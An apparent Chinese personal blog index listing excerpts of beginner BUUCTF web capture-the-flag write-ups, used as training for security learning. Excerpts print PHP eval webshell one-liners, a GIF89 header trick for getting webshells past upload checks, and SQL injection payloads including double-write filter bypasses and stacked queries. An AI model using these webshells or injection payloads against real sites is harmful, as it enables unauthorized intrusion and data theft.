avatar
文章
88
标签
0
分类
0
首页
时光档案
标签
分类
友链
关于
半枫
首页
时光档案
标签
分类
友链
关于

半枫

BUUCTF-Web-[RoarCTF 2019]Easy Calc1
发表于2025-08-03
本文为记录个人信安小白的刷题路程,大佬勿喷,也同时希望文章能对您有所帮助 打开靶机,是一个有简单计算功能的网站看看是不是注入点,被过滤了,查看源码,这里他提示建了WAF保障安全 1234567891011121314151617<script> $('#calc').submit(function(){ //当 ID 为 calc 的表单提交时,触发回调函数 $.ajax({ url:"calc.php?num="+encodeURIComponent($("#content").val()), //使用GET方法向calc.php发送请求 type:'GET', success:function(data){ //成功是:在 ID 为 result 的元素中显示 ...
BUUCTF-Web-[ACTF2020 新生赛]BackupFile1
发表于2025-08-03
本文为记录个人信安小白的刷题路程,大佬勿喷,也同时希望文章能对您有所帮助 打开靶机,提示让我们找找源文件,F12查看源码没有看到有用的信息,使用dirsearch扫描网站注意到index.php.bak文件通过URL下载 代码审计123456789101112131415161718<?phpinclude_once "flag.php"; //引入了包含flag变量的文件if(isset($_GET['key'])) { //验证是否GET传入key参数,如果有就赋值 $key = $_GET['key']; if(!is_numeric($key)) { //检查key是否为数字 exit("Just num!"); } $key = intval($key); //将key转换为整数 $str = "123ffwsfwefwf24r2f32ir23jrw923rskfjwtsw54w3&q...
BUUCTF-Web-[极客大挑战 2019]PHP1
发表于2025-08-01
本文为记录个人信安小白的刷题路程,大佬勿喷,也同时希望文章能对您有所帮助 打开靶机,发现一只好玩的小猫,这里有一个明显的提示备份网站的良好习惯(”备份网站” 通常指网站开发者或管理员为防止数据丢失而创建的网站文件副本。这类备份文件可能包含敏感信息(如源码、数据库凭证),常成为渗透测试或CTF中的突破口。) 使用dirsearch扫描网站如果使用默认配置会出现429报错(在使用 Dirsearch 进行目录扫描时,如果一直返回 429 错误,这通常是因为请求频率过高)需要通过降低线程数和增加请求之间的延迟,可以减少服务器的负载,从而避免429错误(这是方法之一,扫描会很慢)常见备份文件名如 www.zip、website.bak、index.php.bak、.git 目录等。这里发现www.zip文件,通过URL下载 代码审计其中有一个flag.php文件,但并不是真正的flag看到index.php和class.php文件index.php:注意到36行 12345<?php include 'class.php'; $select = $_...
BUUCTF-Web-[极客大挑战 2019]BabySQL
发表于2025-07-31
本文为记录个人信安小白的刷题路程,大佬勿喷,也同时希望文章能对您有所帮助 打开靶机,看到熟悉的登录入口,老样子,看看是什么注入类型(在用户名位置写payload,密码随便写数字) 11' 报错:你有一个错误在你的SQL语法;检查与您的MariaDB服务器版本对应的手册,以便在第1行’1”附近使用正确的语法 爆破字段数11' order by 3# 发现报错回显der 3#,与输入的payload相比缺少or,by字符推测or,by被过滤了,试一下双写绕过(例如bbyy中by字符被过滤后就会变成by字符) 11' oorrder bbyy 3# 正常回显 11' oorrder bbyy 4# 确定字段数(列数)为3 11' union select 1,2,3# 分析回显发现union和select也被过滤了 11' ununionion selselectect 1,2,3# 爆数据库名和版本名11' ununionion selselectect 1,database(),version()# 爆表名这...
BUUCTF-Web-[ACTF2020 新生赛]Upload1
发表于2025-07-28
本文为记录个人信安小白的刷题路程,大佬勿喷,也同时希望文章能对您有所帮助 打开靶机,看见一个文件上传路径,推测为文件上传漏洞,上传一个测试文件,看看有什么限制上传文件需要满足为jpg、png、gif结尾的图片,我们选择jpg结尾,并加上GIF89文件头绕开文件头检测, 12GIF89<script language='php'>@eval($ POST['cmd']);</script> 上传成功,但我们需要的是php可执行文件,但直接burp抓包修改为php后缀会被检查过滤,绕过php后缀的文件格式有php3,php4,php5,phtml,pht进过尝试发现phtml后缀可以,在响应美化界面中找到文件存储路径,查看上传文件,上传木马文件成功,打开蚁剑连接,在根目录下找找获得flag
BUUCTF-Web-[极客大挑战 2019]Knife1
发表于2025-07-28
本文为记录个人信安小白的刷题路程,大佬勿喷,也同时希望文章能对您有所帮助 打开靶机,看到一个很明显的提示,题目已经把后门函数给我们了,打开蚁剑连接,连接成功,尝试在根目录下找到flag文件,获得flag
BUUCTF-Web-[极客大挑战 2019]Upload1
发表于2025-07-27
本文为记录个人信安小白的刷题路程,大佬勿喷,也同时希望文章能对您有所帮助 打开靶机,看到一个文件上传入口,结合题目可以知道这是一个文件上传漏洞首先想到的是木马上传,创建一个php文件,写上一句话木马并上传一句话木马的基本写法 12341.<?php @eval($_POST['cmd']);?>2.<?=@eval($_POST['cmd']);?>3.<script language="php">eval($_REQUEST[cmd])</script> 返回结果反应上传文件为图片文件才行,使用Burp抓包修改数据包进行绕过将Content-Type修改为image/jpeg返回结果反应不能是php文件,修改后缀名.txt(试试其他后缀名也可以,不被过滤就行)<?被过滤,换另一个木马格式回显还是说不能上传,说明他可能坚持文件头,我们可以用文件头欺骗绕过一下,在文件最开始加上GIF89回显上传成功,现在我们需要找到木马文件(test.php)的位置一般猜测在uploa...
BUUCTF-Web-[极客大挑战 2019]Http
发表于2025-07-26
本文为记录个人信安小白的刷题路程,大佬勿喷,也同时希望文章能对您有所帮助 前端检查打开靶机,F12查看前端源码,发现Secret.php文件,访问看看 Referer字段你不来自’https://Sycsecret.buuoj.cn‘显示请求头不对,使用Burp抓包修改请求头,找到Get请求Secret.php历史记录发送到RepeaterHTTP Referer(或 Referrer) 是 HTTP 请求头的一个字段,用于表示当前请求是从哪个网页链接过来的。它的主要作用是告诉服务器用户浏览器的来源页面,通常用于统计分析、防盗链、日志记录等场景。通过添加请求头来告诉服务器访问来源 1Referer:https://Sycsecret.buuoj.cn User-Agent字段User-Agent 是 HTTP 请求头中的一个重要字段,用于标识发起请求的客户端(如浏览器、爬虫、应用程序等)的软件类型、版本、操作系统等信息。服务器可以根据该字段返回适配的内容,或用于统计分析、访问控制等场景。 示例1Mozilla/5.0 (Windows NT 10.0; Win64; x64) ...
BUUCTF-Web-[强网杯 2019]随便注1
发表于2025-07-25
本文为记录个人信安小白的刷题路程,大佬勿喷,也同时希望文章能对您有所帮助 打开靶机,发现一个查询入口,查询不同的数字返回不同的字符串 判断是否为字符型注入11' 判断为字符型注入 确定字段数11' order by 3;# 11' order by 2;# 确定字段数为2 爆数据库11' union select database(),version();# 发现联合查询被过滤 改用堆叠注入 11';show databases;# 爆表11';show tables;# 爆列两个表都爆一下;words表: 11';show columns from words;# 1919810931114514 表: 11';show columns from `1919810931114514`;# //数字表名需要用反引号括起来 可以看到words表有id data两个字段,1919810931114514表有最想要的flag字段 爆flag返回到第一个网页(就是打开靶机进入的第一个网页)我们输入p...
BUUCTF-Web-[极客大挑战 2019]Secret File
发表于2025-07-23
本文为记录个人信安小白的刷题路程,大佬勿喷,也同时希望文章能对您有所帮助 打开靶机,没有明显提示信息,F12看看源码发现隐藏文件Achieve.php,访问一下点击SECRET,查找源码没有发现有用信息,返回上一个页面查看源码,又发现一个隐藏文件action.php,访问一下还是返回这个页面 试试Burpsuit抓包看看有没有其他信息隐藏在action.php这个请求页面有发现一个隐藏文件secre3t.php访问看到一段源码 1234567891011<?php highlight_file(__FILE__); error_reporting(0); $file=$_GET['file']; if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){ echo "Oh no!";...
1…789
avatar
半枫
Welcome to my blog
文章
88
标签
0
分类
0
Follow Me
公告
This is my Blog
最新文章
VS2017+WDK7.1驱动开发TitanHide2026-02-02
vmp反调试学习及其绕过方法2026-01-28
环境变量处理API-GetEnvironmentVariable2026-01-17
目录处理函数-GetWindowsDirectory、PathCanonicalize与PathIsRelative2026-01-17
字符串处理API-StringCchCopy、ExpandEnvironmentStrings与StringCchPrintf2026-01-16
归档
  • 二月 2026 1
  • 一月 2026 9
  • 十二月 2025 3
  • 十一月 2025 10
  • 十月 2025 10
  • 九月 2025 4
  • 八月 2025 36
  • 七月 2025 15
网站信息
文章数目 :
88
本站访客数 :
本站总浏览量 :
最后更新时间 :
© 2025 - 2026 By 半枫框架 Hexo 7.3.0|主题 Butterfly 5.4.3